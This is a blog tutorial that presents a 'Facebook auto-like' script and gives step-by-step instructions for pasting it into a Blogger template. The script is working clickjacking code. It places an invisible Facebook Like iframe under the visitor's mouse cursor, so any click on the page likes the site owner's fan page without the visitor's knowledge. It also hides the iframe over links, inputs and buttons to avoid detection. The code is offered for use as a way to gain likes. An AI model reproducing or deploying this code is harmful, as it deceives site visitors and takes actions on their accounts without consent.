Facebook Auto-Like Free Webpage Script ..!!

Facebook is a great place where you can share your thoughts and updates with your friend ,relatives and with your business customers via page.!As I have previously posted many Facebook tricks like :- 
  1. How to Find Facebook Profile /Page Username ID
  2. How To Make Single Name Or How To Remove Last Last From Facebook Account?
  3. How To Invite All Friends To Like Page By Using JavaScript ?
  4. How To Post Invisible Status On Facebook!
  5. Facebook Like Box Popup With Timer For Blogger/Blogspot With jQuery
  6. How To Post Any Picture In Your Facebook Chat Box.

You Must also take a on this topic also :- Why is Facebook Blue? Today i am again back with an amazing Facebook auto like  trick  Facebook has already been a great place to get more fans and share Stuff and updates with them, more fans on your page means more exposure to your business . Many People are using autolikers which were working previously  but Now-a-days they are on creating Spam.Whatever is the means of liking's ,no one cares about it ,all just want likes and likes on their fan page .!

Well today I have found a unique  script for your blogs or website which can gain more unique likes to your Facebook page, with this script applied any unique visitor who comes to your page can become your fan. He just needs to click anywhere on the webpage as a small invisible like button will follow his mouse cursor and as soon he clicks anywhere he will be liking your fan page. So this trick is quite useful and helps you a lot .. Now Lets take a look at adding this script in blogger  .! 
 First see demo of the like box by clicking on the button below.
Live Demo
In Demo Blog You can see where ever you move your mouse pointer your mouse looks like it it on hyperlink..! If You Have liked This page then mouse will remain as it is ..! Click anywhere on that page and Then check your timeline .!  :D  ^_^  :P 


How To Add Auto-like Script In Blogger ?


  1. Now go to Blogger Dashboard > Template
  2. Download a copy of your template

    Click Here 

    <-To Know How To Take Backup Of Your Template 

  3. Click on Edit HTML
  4. Hit Proceed button
  5. Check Expand Widget Templates checkbox
  6. Find  Ctrl + F   below code in your template 
 </head>
7.Now paste the below Code above it.



<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"
type="text/javascript">
</script>
<script type='text/javascript'>
function ClickJackFbHide(){
jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
}
function ClickJackFbShow(){
jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
}
</script>


8.Now Search  for :- 
 </body>
9.And then  paste below code above it.


<!-- mytrickscorner.blogspot.com/ Fan Page Autolike Script Starts -->
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity =0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com/MyTricksCorner&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
       
jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});      
jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});      
jQuery("object").mouseover(function(){ClickJackFbHide();});
        }
  </script>
 <!-- mytrickscorner.blogspot.com/ Fan Page Autolike Script Ends -->


10.Replace MyTricksCorner With your Facebook Page's Username ...!
11. Save The Template

DONE..!

Comments
0 Comments